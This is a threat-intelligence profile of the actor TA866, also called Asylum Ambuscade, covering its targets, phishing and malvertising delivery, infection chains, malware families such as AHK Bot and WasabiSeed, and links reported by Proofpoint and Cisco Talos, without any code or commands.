TA866

TA866, also known as Asylum Ambuscade, is a threat actor tracked by Proofpoint that has engaged in both financially motivated cybercrime and cyberespionage activity. Proofpoint began tracking TA866 as a distinct cluster in October 2022 under the activity name “Screentime,” while reporting on Asylum Ambuscade dates back to at least March 2022, with activity assessed as ongoing since at least 2020. The group has targeted organizations primarily in the United States and Germany in crimeware campaigns, and has also targeted European government staff involved in assisting Ukrainian refugees, as well as government entities and state-owned organizations in Europe, Central Asia, and Armenia. Reported victimology also includes bank customers, cryptocurrency traders, individuals, and SMBs, with more than 4,500 victims worldwide counted since January 2022. TA866/Asylum Ambuscade commonly uses email-based delivery, malicious attachments or URLs, spearphishing, malspam, malvertising, malicious Google Ads, and traffic distribution systems. Multiple reports associate the actor with use of TAG-124 infrastructure, and other reporting links Asylum Ambuscade to a traffic distribution system Proofpoint called 404 TDS. Observed lures include invoice themes, job-related themes, thread hijacking, “check my presentation” themes, PDF attachments containing OneDrive links, malicious Publisher files with macros, malicious Excel attachments, JavaScript downloaders, and fake browser update or ClickFix-style flows delivered through compromised websites. Observed infection chains include JavaScript downloaders that install MSI packages, VBS downloaders such as WasabiSeed, and first-stage downloaders in Lua, Tcl, and VBS collectively referred to as SunSeed variants. TA866 has used WasabiSeed to establish persistence and repeatedly poll command-and-control for additional MSI payloads. A distinctive feature of TA866 activity is use of a “Screenshotter” payload to capture and exfiltrate desktop screenshots so operators can manually triage victims before delivering follow-on tooling. Post-exploitation tooling associated with TA866 includes AHK Bot, NODEBOT, Screenshotter, WasabiSeed, SunSeed, Rhadamanthys, Resident backdoor-linked tooling, WarmCookie/BadSpace-linked activity, and malware with technical overlaps such as PS1Bot. AHK Bot is an AutoHotkey-based modular downloader/bot that can profile Active Directory domain membership and load additional payloads in memory, including Rhadamanthys Stealer. Its plugin ecosystem has included keylogging, screenshot capture, browser password theft, Active Directory and domain discovery, process and window listing, hVNC deployment, and downloading or launching additional payloads including Cobalt Strike and Remote Utilities RAT. In March 2023, the actor developed NODEBOT, a Node.js equivalent assessed as intended to bypass security detections. TA866 has been linked to Rhadamanthys activity by Proofpoint, including campaigns where TA571 handled spam distribution and TA866 conducted post-exploitation. Cisco Talos reported notable development links between WarmCookie/BadSpace and the Resident backdoor, suggesting possible shared authorship associated with TA866, and also reported links between WarmCookie and TA866. Talos further assessed PS1Bot to share technical overlaps with AHK Bot, which had previously been used by Asylum Ambuscade/TA866. The actor’s tradecraft includes use of scripting languages such as AutoHotkey, JavaScript, Lua, Python, VBS, and Node.js; use of MSI-based staging; persistence via startup shortcuts, scheduled tasks, and other mechanisms; repeated C2 polling keyed to host identifiers such as the C: drive serial number; in-memory execution of follow-on payloads; and use of compromised or shared infrastructure. In espionage operations, TA866 used spearphishing with malicious Excel attachments and, in June 2022, exploited Follina (CVE-2022-30190). Reported espionage objectives included theft of confidential information and webmail credentials from official government webmail portals. TA866 is also reported as one of multiple downstream users of shared initial access infrastructure, including KongTuke and TAG-124, alongside other cybercriminal and ransomware actors. Overall, the reporting consistently characterizes TA866/Asylum Ambuscade as a primarily crimeware-focused actor that also conducts periodic cyberespionage operations.